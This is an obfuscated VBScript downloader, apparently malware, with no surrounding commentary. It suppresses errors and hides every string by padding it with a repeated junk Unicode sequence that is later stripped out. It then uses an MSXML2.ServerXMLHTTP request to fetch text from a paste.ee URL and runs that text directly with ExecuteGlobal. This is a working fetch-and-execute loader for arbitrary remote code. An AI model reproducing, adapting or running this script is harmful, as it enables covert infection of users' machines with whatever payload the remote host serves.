

On Error Resume Next

Dim clarion, supposable, psychocurative, abrosias, primatology, attonements


abrosias = "MSቌ෣⢴➇🤙ጨነ᜹🕬܏⤤๵⣋ⴎథXML2.Sቌ෣⢴➇🤙ጨነ᜹🕬܏⤤๵⣋ⴎథerቌ෣⢴➇🤙ጨነ᜹🕬܏⤤๵⣋ⴎథveቌ෣⢴➇🤙ጨነ᜹🕬܏⤤๵⣋ⴎథrXMLቌ෣⢴➇🤙ጨነ᜹🕬܏⤤๵⣋ⴎథHTTቌ෣⢴➇🤙ጨነ᜹🕬܏⤤๵⣋ⴎథP"
abrosias = Replace(abrosias, "ቌ෣⢴➇🤙ጨነ᜹🕬܏⤤๵⣋ⴎథ", "")


psychocurative = "hቌ෣⢴➇🤙ጨነ᜹🕬܏⤤๵⣋ⴎథtቌ෣⢴➇🤙ጨነ᜹🕬܏⤤๵⣋ⴎథtቌ෣⢴➇🤙ጨነ᜹🕬܏⤤๵⣋ⴎథpቌ෣⢴➇🤙ጨነ᜹🕬܏⤤๵⣋ⴎథ:ቌ෣⢴➇🤙ጨነ᜹🕬܏⤤๵⣋ⴎథ/ቌ෣⢴➇🤙ጨነ᜹🕬܏⤤๵⣋ⴎథ/ቌ෣⢴➇🤙ጨነ᜹🕬܏⤤๵⣋ⴎథpቌ෣⢴➇🤙ጨነ᜹🕬܏⤤๵⣋ⴎథaቌ෣⢴➇🤙ጨነ᜹🕬܏⤤๵⣋ⴎథsቌ෣⢴➇🤙ጨነ᜹🕬܏⤤๵⣋ⴎథtቌ෣⢴➇🤙ጨነ᜹🕬܏⤤๵⣋ⴎథeቌ෣⢴➇🤙ጨነ᜹🕬܏⤤๵⣋ⴎథ.ቌ෣⢴➇🤙ጨነ᜹🕬܏⤤๵⣋ⴎథeቌ෣⢴➇🤙ጨነ᜹🕬܏⤤๵⣋ⴎథeቌ෣⢴➇🤙ጨነ᜹🕬܏⤤๵⣋ⴎథ/ቌ෣⢴➇🤙ጨነ᜹🕬܏⤤๵⣋ⴎథdቌ෣⢴➇🤙ጨነ᜹🕬܏⤤๵⣋ⴎథ/ቌ෣⢴➇🤙ጨነ᜹🕬܏⤤๵⣋ⴎథDቌ෣⢴➇🤙ጨነ᜹🕬܏⤤๵⣋ⴎథAቌ෣⢴➇🤙ጨነ᜹🕬܏⤤๵⣋ⴎథ7ቌ෣⢴➇🤙ጨነ᜹🕬܏⤤๵⣋ⴎథsቌ෣⢴➇🤙ጨነ᜹🕬܏⤤๵⣋ⴎథIቌ෣⢴➇🤙ጨነ᜹🕬܏⤤๵⣋ⴎథlቌ෣⢴➇🤙ጨነ᜹🕬܏⤤๵⣋ⴎథfቌ෣⢴➇🤙ጨነ᜹🕬܏⤤๵⣋ⴎథHቌ෣⢴➇🤙ጨነ᜹🕬܏⤤๵⣋ⴎథ/ቌ෣⢴➇🤙ጨነ᜹🕬܏⤤๵⣋ⴎథ0"
psychocurative = Replace(psychocurative, "ቌ෣⢴➇🤙ጨነ᜹🕬܏⤤๵⣋ⴎథ", "")


primatology = "Gቌ෣⢴➇🤙ጨነ᜹🕬܏⤤๵⣋ⴎథEቌ෣⢴➇🤙ጨነ᜹🕬܏⤤๵⣋ⴎథT"
primatology = Replace(primatology, "ቌ෣⢴➇🤙ጨነ᜹🕬܏⤤๵⣋ⴎథ", "")


attonements = "respoቌ෣⢴➇🤙ጨነ᜹🕬܏⤤๵⣋ⴎథnseቌ෣⢴➇🤙ጨነ᜹🕬܏⤤๵⣋ⴎథText"
attonements = Replace(attonements, "ቌ෣⢴➇🤙ጨነ᜹🕬܏⤤๵⣋ⴎథ", "")


Set clarion = CreateObject(abrosias)
clarion.Open primatology, psychocurative, False
clarion.Send


supposable = Eval("clarion." & attonements)
ExecuteGlobal supposable

